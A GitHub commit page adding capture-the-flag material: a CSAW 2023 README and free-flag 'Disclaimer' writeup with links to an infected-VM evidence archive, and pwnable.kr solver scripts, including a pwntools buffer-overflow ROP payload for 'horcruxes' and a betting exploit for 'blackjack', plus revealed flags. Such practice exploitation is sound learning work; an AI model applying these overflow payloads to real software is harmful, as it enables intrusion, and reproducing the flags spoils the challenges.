Skip to content

Commit 4460ab4

Browse files
some pwnable.kr sols+Prepare csaw sol template (the actual writeups aren't there dw organizers)
1 parent 74d7df9 commit 4460ab4

File tree

7 files changed

+42
-0
lines changed

7 files changed

+42
-0
lines changed

Diff for: .gitignore

+1
Original file line numberDiff line numberDiff line change
@@ -1,3 +1,4 @@
11
*/__pycache__/*
22
__pycache__/
3+
libseccomp.so.2
34

Diff for: csaw/2023/Disclaimer.md

+14
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,14 @@
1+
# Disclaimer
2+
**Points: 0**
3+
**Category: Incident Response**
4+
> Please make sure to do your investigation on a machine that you don't mind having malware on as there will be some malware on these machines that will corrupt the data on your system. You have been warned! Please acknowledge this warning my putting in the following flag --> csawctf{I_will_be_careful_in_my_investigation}
5+
6+
> Here is the link for all the evidence (zip file is about 22GB and the password is infected) --> https://infected-vm-challenge.s3.amazonaws.com/evidence.zip
7+
8+
> Here is a link for a mirror in SE-Asia. If it's a closer region to you than US-East. Please try this link to speed it up --> https://infected-vm-asia-mirror.s3-accelerate.amazonaws.com/evidence.zip
9+
10+
> Here is a link for a mirror in Europe. If it's a closer region to you than US-East. Please try this link to speed it up --> https://infected-vm-europe.s3-accelerate.amazonaws.com/evidence.zip
11+
12+
> Big shoutout to Axel Mierczuk and Dhyey Shah (CTFd) for help in getting this challenge together
13+
14+
Read the disclaimer message in the challenge description, and submit the flag given: `csawctf{I_will_be_careful_in_my_investigation}`.

Diff for: csaw/2023/README.md

+6
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,6 @@
1+
# CSAW Quals 2023
2+
Me and my team did this CTF and got 144th place with 1775 points.
3+
## Writeups
4+
### Incident Response
5+
* [Disclaimer](./Disclaimer.md)
6+

Diff for: pwnable-kr/blackjack.py

+8
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,8 @@
1+
from pwn import *
2+
r = remote('pwnable.kr', 9009)
3+
r.sendline(b'y')
4+
r.sendline(b'1')
5+
for _ in range(2): r.sendline(str(10 ** 6).encode())
6+
r.interactive()
7+
# play the game until you win and get the flag: YaY_I_AM_A_MILLIONARE_LOL
8+

Diff for: pwnable-kr/flag

+2
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,2 @@
1+
ctf{test_flag}
2+

Diff for: pwnable-kr/horcruxes

12.1 KB
Binary file not shown.

Diff for: pwnable-kr/horcruxes.py

+11
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,11 @@
1+
from pwn import *
2+
context.clear(arch='i386', os='linux')
3+
context.binary = e = ELF('./horcruxes')
4+
rop = b'a' * (0x74 + 4+1)
5+
# last gadget -> go back to ropme
6+
rop += p32(0x0809fffc)
7+
print(rop)
8+
#r = gdb.debug('./horcruxes', 'break ropme')
9+
r = process('./horcruxes')
10+
r.sendline(rop)
11+
r.interactive()

0 commit comments

Comments
 (0)